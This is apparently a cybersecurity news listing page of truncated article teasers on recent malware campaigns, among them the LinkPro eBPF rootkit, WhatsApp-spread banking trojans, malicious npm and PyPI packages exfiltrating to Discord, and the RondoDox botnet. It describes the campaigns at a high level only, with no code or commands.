North Korean hackers linked to the Contagious Interview campaign are enhancing their malicious tools by merging two major malware families, BeaverTail and OtterCookie. This evolution, observed by Cisco Talos, shows that the group is actively upgrading its capabilities and refining its JavaScript-based attack methods. Ongoing Campaign and New Findings According to Cisco Talos, the recent […]
An investigation into a compromise of Amazon Web Services, AWS, hosted infrastructure uncovered a new GNU/Linux rootkit named LinkPro, according to Synacktiv. The backdoor relies on two eBPF, extended Berkeley Packet Filter, modules for stealth and remote activation. The initial access vector was an exposed Jenkins server exploited via CVE-2024-23897, after which a malicious Docker
LinkPro Linux Rootkit Uses eBPF to Hide, Activates via Magic TCP Packets Read More »
Cybersecurity researchers have observed a financially motivated threat actor, tracked as UNC5142, leveraging blockchain smart contracts to distribute information-stealing malware targeting both Windows and macOS systems. This operation demonstrates how attackers combine traditional web compromises with modern Web3 technology to evade detection and increase operational resilience. Malware Distribution via WordPress and Blockchain According to the
A newly discovered malware campaign is spreading rapidly across Brazil, using WhatsApp as its main delivery channel. Cybersecurity experts have identified this advanced banking Trojan as “Maverick”, a threat capable of taking remote control of infected computers and stealing sensitive financial data. Massive Scale of Infection Researchers report that over 62,000 infection attempts were blocked
Banking Malware Exploits WhatsApp to Take Remote Control of Computers Read More »
A new, persistent Android campaign, attributed to GhostBat RAT, impersonates Regional Transport Office, RTO, applications to steal banking data from Indian users. Attackers distribute malicious droppers through WhatsApp, SMS with shortened URLs, GitHub hosted APKs, and compromised websites, then use multi stage loading, ZIP header manipulation, native libraries, and extensive string obfuscation to avoid detection
Cybersecurity researchers have uncovered several malicious packages in the npm, Python (PyPI), and RubyGems ecosystems that are exfiltrating sensitive developer data using Discord webhooks as their command-and-control (C2) channels. These compromised packages allow attackers to send stolen information directly to Discord channels they control. Discord Webhooks Used as a Stealthy Data Channel Discord webhooks provide
npm, PyPI, and RubyGems Packages Caught Exfiltrating Developer Data to Discord Channels Read More »
Cybersecurity researchers have exposed a previously undocumented threat actor, TA585, which delivers an off-the-shelf malware called MonsterV2 through targeted phishing campaigns. Proofpoint researchers describe TA585 as operating a self-owned, end-to-end attack chain, managing infrastructure, delivery, and payload installation without relying on third-party distribution services. Background and delivery methods TA585 has used multiple delivery techniques in
Researchers Reveal TA585’s MonsterV2 Malware Capabilities, Full Attack Chain Read More »
Cybersecurity researchers have uncovered an ongoing wave of RondoDox botnet campaigns that now exploit more than 50 security vulnerabilities affecting over 30 technology vendors. Trend Micro described this campaign as an “exploit shotgun” strategy, where attackers target a broad spectrum of internet-exposed infrastructure including routers, DVRs, NVRs, CCTV systems, web servers, and other network-connected devices.
RondoDox Botnet Exploits 50+ Vulnerabilities from 30 Vendors in Ongoing Attacks Read More »
Security researchers have uncovered a new Astaroth banking trojan campaign that uses GitHub as a fallback infrastructure, allowing the malware to remain operational even after traditional command and control servers are taken down. By hosting encrypted configuration data on GitHub, the attackers make the campaign more resilient, and victims continue to be compromised across multiple
Astaroth Banking Trojan Uses GitHub to Stay Active After Multiple Takedowns Read More »
Security researchers have discovered 175 malicious packages on the npm registry, collectively downloaded about 26,000 times, that were used as part of a credential phishing campaign named Beamglea. The campaign used npm and unpkg.com as free hosting to serve redirect scripts, which in turn sent victims to Microsoft credential harvesting pages, increasing the realism and